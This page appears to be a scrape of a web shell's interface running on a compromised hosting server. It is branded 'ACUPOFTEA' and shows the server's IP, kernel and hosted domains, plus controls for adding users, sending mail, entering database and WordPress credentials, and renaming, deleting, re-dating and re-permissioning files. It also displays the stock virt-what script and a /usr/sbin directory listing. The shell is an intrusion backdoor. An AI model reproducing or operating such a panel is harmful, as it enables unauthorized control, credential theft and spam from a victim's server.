System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
dr-xr-xr-x
]
:
/
usr
/
sbin
/
216.73.216.50
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
virt-what
#!/bin/sh - # virt-what. Generated from virt-what.in by configure. # Copyright (C) 2008-2022 Red Hat Inc. # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. # 'virt-what' tries to detect the type of virtualization being # used (or none at all if we're running on bare-metal). It prints # out one or more lines each being a 'fact' about the virtualization. # # Please see also the manual page virt-what(1). # This script should be run as root. # # The following resources were useful in writing this script: # . http://dmo.ca/blog/detecting-virtualization-on-linux/ # Do not allow unset variables, and set defaults. set -u root='' skip_qemu_kvm=false skip_lkvm=false VERSION="1.25" have_cpuinfo () { test -e "${root}/proc/cpuinfo" } use_sysctl() { # Lacking /proc, on some systems sysctl can be used instead. OS=$(uname) || fail "failed to get operating system name" [ "$OS" = "OpenBSD" ] } fail () { echo "virt-what: $1" >&2 exit 1 } usage () { echo "virt-what [options]" echo "Options:" echo " --help Display this help" echo " --version Display version and exit" exit 0 } # Handle the command line arguments, if any. while test $# -gt 0; do case "$1" in --help) usage ;; --test-root=*) # Deliberately undocumented: used for 'make check'. root=$(echo "$1" | sed 's/.*=//') shift 1 test -z "$root" && fail "--test-root option requires a value" ;; -v|--version) echo "$VERSION"; exit 0 ;; --) shift; break ;; *) fail "unrecognized option '$1'";; esac done test $# -gt 0 && fail "extra operand '$1'" # Add /sbin and /usr/sbin to the path so we can find system # binaries like dmidecode. # Add /usr/libexec to the path so we can find the helper binary. prefix=/usr exec_prefix=/usr PATH="${root}/usr/libexec:${root}/sbin:${root}/usr/sbin:${PATH}" export PATH # Check we're running as root. EFFUID=$(id -u) || fail "failed to get current user id" if [ "x$root" = "x" ] && [ "$EFFUID" -ne 0 ]; then fail "this script must be run as root" fi # Try to locate the CPU-ID helper program CPUID_HELPER=$(which virt-what-cpuid-helper 2>/dev/null) if [ -z "$CPUID_HELPER" ] ; then fail "virt-what-cpuid-helper program not found in \$PATH" fi # Many fullvirt hypervisors give an indication through CPUID. Use the # helper program to get this information. cpuid=$(virt-what-cpuid-helper) # Check for various products in the BIOS information. # Note that dmidecode doesn't exist on all architectures. On the ones # it does not, then this will return an error, which is ignored (error # message redirected into the $dmi variable). dmi=$(LANG=C dmidecode 2>&1) # Architecture. # Note for the purpose of testing, we only call uname with -m option. arch=$(uname -m | sed -e 's/i.86/i386/' | sed -e 's/arm.*/arm/') # Check for Alibaba Cloud if echo "$dmi" | grep -q 'Manufacturer: Alibaba'; then # Check for Alibaba Cloud ECS Bare Metal (EBM) Instance if [ "x$root" = "x" ] && ( { echo -e "GET /latest/meta-datainstance/instance-type HTTP/1.0\r\nHost: 100.100.100.200\r\n\r" >&3; grep -sq 'ebm' <&3 ; } 3<> /dev/tcp/100.100.100.200/80 ) 2>/dev/null ; then echo "alibaba_cloud-ebm" else echo "alibaba_cloud" fi fi # Check for VMware. # cpuid check added by Chetan Loke. if [ "$cpuid" = "VMwareVMware" ]; then echo vmware elif echo "$dmi" | grep -q 'Manufacturer: VMware'; then echo vmware fi # Check for Hyper-V. # http://blogs.msdn.com/b/sqlosteam/archive/2010/10/30/is-this-real-the-metaphysics-of-hardware-virtualization.aspx if [ "$cpuid" = "Microsoft Hv" ]; then echo hyperv fi # Check for VirtualPC. # The negative check for cpuid is to distinguish this from Hyper-V # which also has the same manufacturer string in the SM-BIOS data. if [ "$cpuid" != "Microsoft Hv" ] && echo "$dmi" | grep -q 'Manufacturer: Microsoft Corporation' && echo "$dmi" | grep -q 'Product Name: Virtual Machine'; then echo virtualpc fi # Check for VirtualBox. # Added by Laurent Léonard. if echo "$dmi" | grep -q 'Manufacturer: innotek GmbH'; then echo virtualbox fi # Check for bhyve. if [ "$cpuid" = "bhyve bhyve " ]; then echo bhyve elif echo "$dmi" | grep -q "Vendor: BHYVE"; then echo bhyve fi # Check for OpenVZ / Virtuozzo. # Added by Evgeniy Sokolov. # /proc/vz - always exists if OpenVZ kernel is running (inside and outside # container) # /proc/bc - exists on node, but not inside container. if [ -d "${root}/proc/vz" -a ! -d "${root}/proc/bc" ]; then echo openvz fi # Check for LXC containers # http://www.freedesktop.org/wiki/Software/systemd/ContainerInterface # Added by Marc Fournier if [ -e "${root}/proc/1/environ" ] && tr '\000' '\n' < "${root}/proc/1/environ" | grep -Eiq '^container=lxc'; then echo lxc fi # Check for Illumos LX if [ -e "${root}/proc/1/environ" ] && tr '\0' '\n' < "${root}/proc/1/environ" | grep -q '^container=zone$' && [ -e "${root}/proc/version" ] && grep -q 'BrandZ virtual linux' < "${root}/proc/version"; then echo illumos-lx fi # Check for Docker. if [ -f "${root}/.dockerenv" ] || [ -f "${root}/.dockerinit" ] || \ grep -qF /docker/ "${root}/proc/self/cgroup" 2>/dev/null; then echo docker fi # Check for OCI. if [ -e "${root}/proc/1/environ" ] && cat "${root}/proc/1/environ" | tr '\000' '\n' | grep -Eiq '^container=oci'; then echo oci fi # Check for CRI-O. if [ -e "${root}/proc/1/environ" ] && cat "${root}/proc/1/environ" | tr '\000' '\n' | grep -Eiq '^container=crio'; then echo crio fi # Check for Podman. if [ -e "${root}/proc/1/environ" ] && cat "${root}/proc/1/environ" | tr '\000' '\n' | grep -Eiq '^container=podman'; then echo podman elif grep -qF /libpod- "${root}/proc/self/cgroup" 2>/dev/null; then echo podman fi # Check for Linux-VServer if test -e "${root}/proc/self/status" \ && cat "${root}/proc/self/status" | grep -q "VxID: [0-9]*"; then echo linux_vserver if grep -q "VxID: 0$" "${root}/proc/self/status"; then echo linux_vserver-host else echo linux_vserver-guest fi fi # Check for UML. # Added by Laurent Léonard. if have_cpuinfo && grep -q 'UML' "${root}/proc/cpuinfo"; then echo uml fi # Check for IBM PowerVM Lx86 Linux/x86 emulator. if have_cpuinfo && grep -q '^vendor_id.*PowerVM Lx86' "${root}/proc/cpuinfo" then echo powervm_lx86 fi # Check for Hitachi Virtualization Manager (HVM) Virtage logical partitioning. if echo "$dmi" | grep -q 'Manufacturer.*HITACHI' && echo "$dmi" | grep -q 'Product.* LPAR'; then echo virtage fi # Check for IBM SystemZ. if have_cpuinfo && grep -q '^vendor_id.*IBM/S390' "${root}/proc/cpuinfo"; then echo ibm_systemz if [ -f "${root}/proc/sysinfo" ]; then if grep -q 'VM.*Control Program.*KVM/Linux' "${root}/proc/sysinfo"; then echo ibm_systemz-kvm elif grep -q 'VM.*Control Program.*z/VM' "${root}/proc/sysinfo"; then echo ibm_systemz-zvm elif grep -q '^LPAR' "${root}/proc/sysinfo"; then echo ibm_systemz-lpar else # This is unlikely to be correct. echo ibm_systemz-direct fi fi fi # Check for Parallels. if echo "$dmi" | grep -q 'Vendor: Parallels'; then echo parallels skip_qemu_kvm=true fi # Check for Nutanix AHV. if echo "$dmi" | grep -q 'Manufacturer: Nutanix'; then echo nutanix_ahv fi # Check for oVirt/RHEV. if echo "$dmi" | grep -q 'Manufacturer: oVirt'; then echo ovirt fi if echo "$dmi" | grep -q 'Product Name: RHEV Hypervisor'; then echo rhev fi # Google Cloud if echo "$dmi" | grep -q 'Product Name: Google Compute Engine'; then echo google_cloud fi # Red Hat's hypervisor. if echo "$dmi" | grep -q 'Manufacturer: Red Hat'; then echo redhat fi # Check for Xen. if [ "$cpuid" = "XenVMMXenVMM" ] && ! echo "$dmi" | grep -q 'No SMBIOS nor DMI entry point found, sorry'; then echo xen; echo xen-hvm skip_qemu_kvm=true elif [ -d "${root}/proc/xen" ]; then echo xen if grep -q "control_d" "${root}/proc/xen/capabilities" 2>/dev/null; then echo xen-dom0 else echo xen-domU fi skip_qemu_kvm=true skip_lkvm=true elif [ -f "${root}/sys/hypervisor/type" ] && grep -q "xen" "${root}/sys/hypervisor/type"; then # Ordinary kernel with pv_ops. There does not seem to be # enough information at present to tell whether this is dom0 # or domU. XXX echo xen elif [ "$arch" = "arm" ] || [ "$arch" = "aarch64" ]; then if [ -d "${root}/proc/device-tree/hypervisor" ] && grep -q "xen" "${root}/proc/device-tree/hypervisor/compatible"; then echo xen skip_qemu_kvm=true skip_lkvm=true elif [ -d "${root}/proc/device-tree/hypervisor" ] && grep -q "vmware" "${root}/proc/device-tree/hypervisor/compatible"; then echo vmware skip_lkvm=true fi elif [ "$arch" = "ia64" ]; then if [ -d "${root}/sys/bus/xen" -a ! -d "${root}/sys/bus/xen-backend" ]; then # PV-on-HVM drivers installed in a Xen guest. echo xen echo xen-hvm else # There is no virt leaf on IA64 HVM. This is a last-ditch # attempt to detect something is virtualized by using a # timing attack. virt-what-ia64-xen-rdtsc-test > /dev/null 2>&1 case "$?" in 0) ;; # not virtual 1) # Could be some sort of virt, or could just be a bit slow. echo virt esac fi fi # Check for QEMU/KVM. # # Parallels exports KVMKVMKVM leaf, so skip this test if we've already # seen that it's Parallels. Xen uses QEMU as the device model, so # skip this test if we know it is Xen. if ! "$skip_qemu_kvm"; then if [ "$cpuid" = "KVMKVMKVM" ]; then echo kvm elif [ "$cpuid" = "TCGTCGTCGTCG" ]; then echo qemu skip_lkvm=true elif echo "$dmi" | grep -q 'Product Name: KVM'; then echo kvm skip_lkvm=true elif echo "$dmi" | grep -q 'Manufacturer: KVM'; then echo kvm skip_lkvm=true elif echo "$dmi" | grep -q 'Manufacturer: Amazon EC2' && echo "$dmi" | grep -q 'System is a virtual machine'; then # This is for AWS Graviton (Arm) systems which don't have CPUID. echo kvm skip_lkvm=true elif echo "$dmi" | grep -q 'Manufacturer: Alibaba Cloud' && echo "$dmi" | grep -q 'System is a virtual machine'; then # This is for Alibaba Arm systems which don't have CPUID. echo kvm skip_lkvm=true elif echo "$dmi" | grep -q 'Manufacturer: QEMU'; then # The test for KVM above failed, so now we know we're # not using KVM acceleration. echo qemu skip_lkvm=true elif [ "$arch" = "arm" ] || [ "$arch" = "aarch64" ]; then if [ -d "${root}/proc/device-tree" ] && ls "${root}/proc/device-tree" | grep -q "fw-cfg"; then # We don't have enough information to determine if we're # using KVM acceleration or not. echo qemu skip_lkvm=true fi elif [ -d ${root}/proc/device-tree/hypervisor ] && grep -q "linux,kvm" /proc/device-tree/hypervisor/compatible; then # We are running as a spapr KVM guest on ppc64 echo kvm skip_lkvm=true elif use_sysctl; then # SmartOS KVM product=$(sysctl -n hw.product) if echo "$product" | grep -q 'SmartDC HVM'; then echo kvm fi else # This is known to fail for qemu with the explicit -cpu # option, since /proc/cpuinfo will not contain the QEMU # string. QEMU 2.10 added a new CPUID leaf, so this # problem only triggered for older QEMU if have_cpuinfo && grep -q 'QEMU' "${root}/proc/cpuinfo"; then echo qemu fi fi fi if ! "$skip_lkvm"; then if [ "$cpuid" = "LKVMLKVMLKVM" ]; then echo lkvm elif [ "$arch" = "arm" ] || [ "$arch" = "aarch64" ]; then if [ -d "${root}/proc/device-tree" ] && grep -q "dummy-virt" "${root}/proc/device-tree/compatible"; then echo lkvm fi fi fi # Check ppc64 lpar, kvm or powerkvm # example /proc/cpuinfo line indicating 'not baremetal' # platform : pSeries # # example /proc/ppc64/lparcfg systemtype line # system_type=IBM pSeries (emulated by qemu) if [ "$arch" = "ppc64" ] || [ "$arch" = "ppc64le" ] ; then if have_cpuinfo && grep -q 'platform.**pSeries' "${root}/proc/cpuinfo"; then if grep -q 'model.*emulated by qemu' "${root}/proc/cpuinfo"; then echo ibm_power-kvm else # Assume LPAR, now detect shared or dedicated if grep -q 'shared_processor_mode=1' "${root}/proc/ppc64/lparcfg"; then echo ibm_power-lpar_shared else echo ibm_power-lpar_dedicated fi # detect powerkvm? fi fi fi # Check for OpenBSD/VMM if [ "$cpuid" = "OpenBSDVMM58" ]; then echo vmm fi # Check for LDoms if [ "${arch#sparc}" != "$arch" ] && [ -e "${root}/dev/mdesc" ]; then echo ldoms if [ -d "${root}/sys/class/vlds/ctrl" ] && \ [ -d "${root}/sys/class/vlds/sp" ]; then echo ldoms-control else echo ldoms-guest fi MDPROP="${root}/usr/lib/ldoms/mdprop.py" if [ -x "${MDPROP}" ]; then if [ -n "$($MDPROP -v iodevice device-type=pciex)" ]; then echo ldoms-root echo ldoms-io elif [ -n "$($MDPROP -v iov-device vf-id=0)" ]; then echo ldoms-io fi fi fi # Check for AWS. # AWS on Xen. if echo "$dmi" | grep -Eq 'Version: [0-9]+\.[0-9]+\.amazon'; then echo aws # AWS on baremetal or KVM. elif echo "$dmi" | grep -q 'Vendor: Amazon EC2'; then echo aws fi
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
dr-xr-xr-x
2025-10-21 10:57:26
..
DIR
-
drwxr-xr-x
2025-06-28 07:14:01
NetworkManager
application/x-sharedlib
3.41 MB
-rwxr-xr-x
2025-08-26 09:47:31
accessdb
application/x-sharedlib
12.59 KB
-rwxr-xr-x
2021-10-08 01:04:46
acpid
application/x-sharedlib
62.95 KB
-rwxr-xr-x
2019-10-14 04:19:15
addgnupghome
text/x-shellscript
3 KB
-rwxr-xr-x
2018-12-11 07:44:33
addpart
application/x-sharedlib
24.86 KB
-rwxr-xr-x
2024-04-06 01:02:53
adduser
application/x-sharedlib
148.17 KB
-rwxr-xr-x
2024-04-06 02:00:13
agetty
application/x-sharedlib
62.38 KB
-rwxr-xr-x
2024-04-06 01:02:53
alternatives
application/x-sharedlib
36.66 KB
-rwxr-xr-x
2023-10-14 10:48:04
anacron
application/x-sharedlib
40.99 KB
-rwxr-xr-x
2024-04-06 11:40:05
apachectl
text/x-shellscript
4.52 KB
-rwxr-xr-x
2025-10-15 08:35:27
applygnupgdefaults
text/x-shellscript
2.17 KB
-rwxr-xr-x
2017-12-18 12:28:32
arp
application/x-sharedlib
64.71 KB
-rwxr-xr-x
2020-08-30 05:47:39
arpd
application/x-sharedlib
109.52 KB
-rwxr-xr-x
2024-05-23 08:36:02
arping
application/x-sharedlib
28.74 KB
-rwxr-xr-x
2023-10-14 05:19:01
atd
application/x-sharedlib
32.63 KB
-rwxr-xr-x
2022-10-10 10:23:17
atopacctd
application/x-executable
25.29 KB
-rwxr-xr-x
2022-01-11 04:41:18
atrun
text/x-shellscript
67 B
-rwxr-xr-x
2022-10-10 10:23:17
auditctl
application/x-sharedlib
45.04 KB
-rwxr-xr-x
2025-07-15 09:41:57
auditd
application/x-sharedlib
151.73 KB
-rwxr-xr-x
2025-07-15 09:41:57
augenrules
text/x-shellscript
4.04 KB
-rwxr-xr-x
2025-07-15 09:41:56
aureport
application/x-sharedlib
122.35 KB
-rwxr-xr-x
2025-07-15 09:41:57
ausearch
application/x-sharedlib
130.36 KB
-rwxr-xr-x
2025-07-15 09:41:57
autrace
16.54 KB
-rwxr-x---
2025-07-15 09:41:57
avcstat
application/x-sharedlib
16.4 KB
-rwxr-xr-x
2025-03-11 12:11:55
badblocks
application/x-sharedlib
32.59 KB
-rwxr-xr-x
2025-10-07 07:08:06
biosdecode
application/x-sharedlib
21.45 KB
-rwxr-xr-x
2024-04-06 01:04:35
biosdevname
application/x-sharedlib
46.16 KB
-rwxr-xr-x
2019-10-18 08:07:58
blkdeactivate
text/x-shellscript
15.97 KB
-r-xr-xr-x
2025-07-15 09:03:15
blkdiscard
application/x-sharedlib
29.05 KB
-rwxr-xr-x
2024-04-06 01:02:53
blkid
application/x-sharedlib
98.66 KB
-rwxr-xr-x
2024-04-06 01:02:53
blkmapd
application/x-sharedlib
53.47 KB
-rwxr-xr-x
2025-06-04 10:54:29
blkzone
application/x-sharedlib
49.74 KB
-rwxr-xr-x
2024-04-06 01:02:53
blockdev
application/x-sharedlib
41.3 KB
-rwxr-xr-x
2024-04-06 01:02:53
bridge
application/x-sharedlib
158.25 KB
-rwxr-xr-x
2024-05-23 08:36:02
build-locale-archive
841.02 KB
-rwx------
2025-08-05 02:12:44
capsh
application/x-sharedlib
32.44 KB
-rwxr-xr-x
2024-01-10 02:34:46
cfdisk
application/x-sharedlib
98.4 KB
-rwxr-xr-x
2024-04-06 01:02:53
chcpu
application/x-sharedlib
28.84 KB
-rwxr-xr-x
2024-04-06 01:02:53
chgpasswd
application/x-sharedlib
69.69 KB
-rwxr-xr-x
2024-04-06 02:00:13
chkconfig
application/x-sharedlib
45.11 KB
-rwxr-xr-x
2023-10-14 10:48:04
chpasswd
application/x-sharedlib
61.42 KB
-rwxr-xr-x
2024-04-06 02:00:13
chronyd
application/x-sharedlib
375.66 KB
-rwxr-xr-x
2024-11-05 07:47:21
chroot
application/x-sharedlib
41.52 KB
-rwxr-xr-x
2023-04-01 08:44:39
clock
application/x-sharedlib
65.22 KB
-rwxr-xr-x
2024-04-06 01:02:53
clockdiff
application/x-sharedlib
20.43 KB
-rwxr-xr-x
2023-10-14 05:19:01
consoletype
application/x-sharedlib
11.85 KB
-rwxr-xr-x
2022-10-08 11:08:06
convertquota
application/x-sharedlib
78.68 KB
-rwxr-xr-x
2021-10-09 07:08:37
cracklib-check
application/x-sharedlib
13.05 KB
-rwxr-xr-x
2019-10-12 12:47:15
cracklib-format
text/x-shellscript
251 B
-rwxr-xr-x
2019-10-12 12:47:14
cracklib-packer
application/x-sharedlib
13.05 KB
-rwxr-xr-x
2019-10-12 12:47:15
cracklib-unpacker
application/x-sharedlib
9.03 KB
-rwxr-xr-x
2019-10-12 12:47:15
create-cracklib-dict
text/x-shellscript
990 B
-rwxr-xr-x
2019-10-12 12:47:14
crond
application/x-sharedlib
73.94 KB
-rwxr-xr-x
2024-04-06 11:40:05
csf
245.1 KB
-rwx------
2025-02-28 01:10:41
ctrlaltdel
application/x-sharedlib
24.79 KB
-rwxr-xr-x
2024-04-06 01:02:53
ctstat
application/x-sharedlib
25.33 KB
-rwxr-xr-x
2024-05-23 08:36:03
dcb
application/x-sharedlib
155.04 KB
-rwxr-xr-x
2024-05-23 08:36:02
ddns-confgen
application/x-sharedlib
20.46 KB
-rwxr-xr-x
2025-02-20 09:05:41
debugfs
application/x-sharedlib
231.63 KB
-rwxr-xr-x
2025-10-07 07:08:06
delpart
application/x-sharedlib
24.86 KB
-rwxr-xr-x
2024-04-06 01:02:53
depmod
application/x-sharedlib
159.95 KB
-rwxr-xr-x
2024-04-08 09:18:53
devlink
application/x-sharedlib
215.87 KB
-rwxr-xr-x
2024-05-23 08:36:02
dmfilemapd
application/x-sharedlib
24.55 KB
-r-xr-xr-x
2025-07-15 09:03:19
dmidecode
application/x-sharedlib
141.8 KB
-rwxr-xr-x
2024-04-06 01:04:35
dmsetup
application/x-sharedlib
158.64 KB
-r-xr-xr-x
2025-07-15 09:03:19
dmstats
application/x-sharedlib
158.64 KB
-r-xr-xr-x
2025-07-15 09:03:19
dnssec-checkds
text/plain
936 B
-rwxr-xr-x
2025-02-20 09:05:34
dnssec-coverage
text/plain
938 B
-rwxr-xr-x
2025-02-20 09:05:34
dnssec-dsfromkey
application/x-sharedlib
60.84 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-importkey
application/x-sharedlib
60.84 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-keyfromlabel
application/x-sharedlib
64.76 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-keygen
application/x-sharedlib
72.84 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-keymgr
text/plain
934 B
-rwxr-xr-x
2025-02-20 09:05:34
dnssec-revoke
application/x-sharedlib
56.74 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-settime
application/x-sharedlib
60.84 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-signzone
application/x-sharedlib
117.2 KB
-rwxr-xr-x
2025-02-20 09:05:41
dnssec-verify
application/x-sharedlib
52.84 KB
-rwxr-xr-x
2025-02-20 09:05:41
dovecot
application/x-sharedlib
137.48 KB
-rwxr-xr-x
2025-02-25 08:04:29
dovecot_cpshutdown
text/x-perl
3.27 KB
-rwxr-xr-x
2025-02-25 08:00:42
dpkg-fsys-usrunmess
text/x-perl
12.11 KB
-rwxr-xr-x
2021-12-15 12:46:10
dumpe2fs
application/x-sharedlib
32.52 KB
-rwxr-xr-x
2025-10-07 07:08:06
e2freefrag
application/x-sharedlib
16.42 KB
-rwxr-xr-x
2025-10-07 07:08:06
e2fsck
application/x-sharedlib
328.52 KB
-rwxr-xr-x
2025-10-07 07:08:06
e2image
application/x-sharedlib
36.61 KB
-rwxr-xr-x
2025-10-07 07:08:06
e2label
application/x-sharedlib
110.63 KB
-rwxr-xr-x
2025-10-07 07:08:06
e2mmpstatus
application/x-sharedlib
32.52 KB
-rwxr-xr-x
2025-10-07 07:08:06
e2undo
application/x-sharedlib
20.38 KB
-rwxr-xr-x
2025-10-07 07:08:06
e4crypt
application/x-sharedlib
24.55 KB
-rwxr-xr-x
2025-10-07 07:08:06
e4defrag
application/x-sharedlib
28.49 KB
-rwxr-xr-x
2025-10-07 07:08:06
ebtables
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ebtables-restore
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
ebtables-save
application/x-sharedlib
220.8 KB
-rwxr-xr-x
2024-04-02 06:37:43
edquota
application/x-sharedlib
91.24 KB
-rwxr-xr-x
2021-10-09 07:08:37
ether-wake
application/x-sharedlib
73.99 KB
-rwxr-xr-x
2020-08-30 05:47:39
ethtool
application/x-sharedlib
557.79 KB
-rwxr-xr-x
2022-10-08 05:27:36
exicyclog
text/x-shellscript
11.1 KB
-rwxr-xr-x
2025-05-12 05:54:51
exigrep
text/x-perl
10.52 KB
-rwxr-xr-x
2025-05-12 05:54:51
exim
application/x-executable
1.49 MB
-rwsr-xr-x
2025-05-12 05:54:51
exim_checkaccess
text/x-shellscript
4.83 KB
-rwxr-xr-x
2025-05-12 05:54:51
exim_dbmbuild
application/x-executable
23.23 KB
-rwxr-xr-x
2025-05-12 05:54:51
exim_dumpdb
application/x-executable
38.02 KB
-rwxr-xr-x
2025-05-12 05:54:51
exim_fixdb
application/x-executable
47.56 KB
-rwxr-xr-x
2025-05-12 05:54:51
exim_lock
application/x-executable
26.59 KB
-rwxr-xr-x
2025-05-12 05:54:51
exim_tidydb
application/x-executable
42.35 KB
-rwxr-xr-x
2025-05-12 05:54:51
eximstats
text/x-perl
148.26 KB
-rwxr-xr-x
2025-05-12 05:54:51
exinext
text/x-shellscript
7.14 KB
-rwxr-xr-x
2025-05-12 05:54:51
exiqgrep
text/x-perl
5.66 KB
-rwxr-xr-x
2025-05-12 05:54:51
exiqsumm
text/x-perl
5.32 KB
-rwxr-xr-x
2025-05-12 05:54:51
exiwhat
text/x-shellscript
4.42 KB
-rwxr-xr-x
2025-05-12 05:54:51
exportfs
application/x-sharedlib
82.38 KB
-rwxr-xr-x
2025-06-04 10:54:29
faillock
application/x-sharedlib
20.52 KB
-rwxr-xr-x
2025-08-26 08:59:03
fcgistarter
application/x-sharedlib
17.11 KB
-rwxr-xr-x
2025-10-15 08:39:07
fdformat
application/x-sharedlib
33.17 KB
-rwxr-xr-x
2024-04-06 01:02:53
fdisk
application/x-sharedlib
130.92 KB
-rwxr-xr-x
2024-04-06 01:02:53
filefrag
application/x-sharedlib
16.46 KB
-rwxr-xr-x
2025-10-07 07:08:06
findfs
application/x-sharedlib
12.37 KB
-rwxr-xr-x
2024-04-06 01:02:53
firewalld
text/x-python
6.92 KB
-rwxr-xr-x
2025-03-11 09:51:09
fix-info-dir
text/x-shellscript
7.84 KB
-rwxr-xr-x
2022-04-18 05:09:02
fixfiles
text/x-shellscript
10.48 KB
-rwxr-xr-x
2024-07-02 09:04:19
fsck
application/x-sharedlib
53.47 KB
-rwxr-xr-x
2024-04-06 01:02:53
fsck.cramfs
application/x-sharedlib
41.4 KB
-rwxr-xr-x
2024-04-06 01:02:53
fsck.ext2
application/x-sharedlib
328.52 KB
-rwxr-xr-x
2025-10-07 07:08:06
fsck.ext3
application/x-sharedlib
328.52 KB
-rwxr-xr-x
2025-10-07 07:08:06
fsck.ext4
application/x-sharedlib
328.52 KB
-rwxr-xr-x
2025-10-07 07:08:06
fsck.minix
application/x-sharedlib
98.74 KB
-rwxr-xr-x
2024-04-06 01:02:53
fsck.xfs
text/x-shellscript
1.92 KB
-rwxr-xr-x
2023-10-15 05:10:59
fsfreeze
application/x-sharedlib
16.38 KB
-rwxr-xr-x
2024-04-06 01:02:53
fstrim
application/x-sharedlib
49.6 KB
-rwxr-xr-x
2024-04-06 01:02:53
fuse2fs
application/x-sharedlib
70.39 KB
-rwxr-xr-x
2025-10-07 07:08:06
fuser
application/x-sharedlib
38.14 KB
-rwxr-xr-x
2020-11-06 02:24:16
g13-syshelp
application/x-sharedlib
189.71 KB
-rwxr-xr-x
2022-09-13 10:15:05
genhomedircon
application/x-sharedlib
29.27 KB
-rwxr-xr-x
2024-07-02 09:04:21
genhostid
application/x-sharedlib
11.85 KB
-rwxr-xr-x
2022-10-08 11:08:06
genl
application/x-sharedlib
121.41 KB
-rwxr-xr-x
2024-05-23 08:36:02
genrandom
application/x-sharedlib
12.38 KB
-rwxr-xr-x
2025-02-20 09:05:41
getcap
application/x-sharedlib
12.34 KB
-rwxr-xr-x
2024-01-10 02:34:46
getenforce
application/x-sharedlib
7.84 KB
-rwxr-xr-x
2025-03-11 12:11:55
getpcaps
application/x-sharedlib
12.27 KB
-rwxr-xr-x
2024-01-10 02:34:46
getsebool
application/x-sharedlib
11.88 KB
-rwxr-xr-x
2025-03-11 12:11:55
groupadd
application/x-sharedlib
95.34 KB
-rwxr-xr-x
2024-04-06 02:00:13
groupdel
application/x-sharedlib
91.09 KB
-rwxr-xr-x
2024-04-06 02:00:13
groupmems
application/x-sharedlib
61.48 KB
-rwxr-xr-x
2024-04-06 02:00:13
groupmod
application/x-sharedlib
99.37 KB
-rwxr-xr-x
2024-04-06 02:00:13
grpck
application/x-sharedlib
61.48 KB
-rwxr-xr-x
2024-04-06 02:00:13
grpconv
application/x-sharedlib
57.26 KB
-rwxr-xr-x
2024-04-06 02:00:13
grpunconv
application/x-sharedlib
57.25 KB
-rwxr-xr-x
2024-04-06 02:00:13
grub2-bios-setup
application/x-sharedlib
1.16 MB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-get-kernel-settings
text/x-shellscript
2.68 KB
-rwxr-xr-x
2025-10-07 08:06:32
grub2-install
application/x-sharedlib
1.44 MB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-macbless
application/x-sharedlib
1.14 MB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-mkconfig
text/x-shellscript
8.68 KB
-rwxr-xr-x
2025-10-07 08:06:32
grub2-ofpathname
application/x-sharedlib
242.26 KB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-probe
application/x-sharedlib
1.16 MB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-reboot
text/x-shellscript
3.99 KB
-rwxr-xr-x
2025-10-07 08:06:32
grub2-rpm-sort
application/x-sharedlib
279.16 KB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-set-bootflag
application/x-sharedlib
16.34 KB
-rwsr-xr-x
2025-10-07 08:06:34
grub2-set-default
text/x-shellscript
3.45 KB
-rwxr-xr-x
2025-10-07 08:06:32
grub2-set-password
text/x-shellscript
3.05 KB
-rwxr-xr-x
2025-10-07 08:06:32
grub2-setpassword
text/x-shellscript
3.05 KB
-rwxr-xr-x
2025-10-07 08:06:32
grub2-sparc64-setup
application/x-sharedlib
1.16 MB
-rwxr-xr-x
2025-10-07 08:06:34
grub2-switch-to-blscfg
text/x-shellscript
8.6 KB
-rwxr-xr-x
2025-10-07 08:06:32
grubby
text/x-shellscript
260 B
-rwxr-xr-x
2024-04-06 01:02:18
gss-server
application/x-sharedlib
24.62 KB
-rwxr-xr-x
2025-06-03 02:06:30
gssproxy
application/x-sharedlib
132.08 KB
-rwxr-xr-x
2022-10-08 08:02:59
halt
application/x-sharedlib
218.45 KB
-rwxr-xr-x
2025-04-22 01:58:57
hardlink
application/x-sharedlib
17.09 KB
-rwxr-xr-x
2019-10-15 09:49:06
hdparm
application/x-sharedlib
131.91 KB
-rwxr-xr-x
2021-10-08 07:47:35
htcacheclean
application/x-sharedlib
44.36 KB
-rwxr-xr-x
2025-10-15 08:39:07
httpd
application/x-sharedlib
990.57 KB
-rwxr-xr-x
2025-10-15 08:39:07
hwclock
application/x-sharedlib
65.22 KB
-rwxr-xr-x
2024-04-06 01:02:53
iconvconfig
application/x-sharedlib
33.05 KB
-rwxr-xr-x
2025-08-05 02:12:44
ifconfig
application/x-sharedlib
80.86 KB
-rwxr-xr-x
2020-08-30 05:47:39
ifdown
text/x-shellscript
2.07 KB
-rwxr-xr-x
2022-08-10 01:03:37
ifenslave
application/x-sharedlib
24.95 KB
-rwxr-xr-x
2023-10-14 05:19:01
ifstat
application/x-sharedlib
117.67 KB
-rwxr-xr-x
2024-05-23 08:36:02
ifup
text/x-shellscript
5.33 KB
-rwxr-xr-x
2022-08-10 01:03:37
imunify-notifier
application/x-executable
9.82 MB
-rwxr-xr-x
2024-10-25 12:14:24
init
application/x-sharedlib
1.53 MB
-rwxr-xr-x
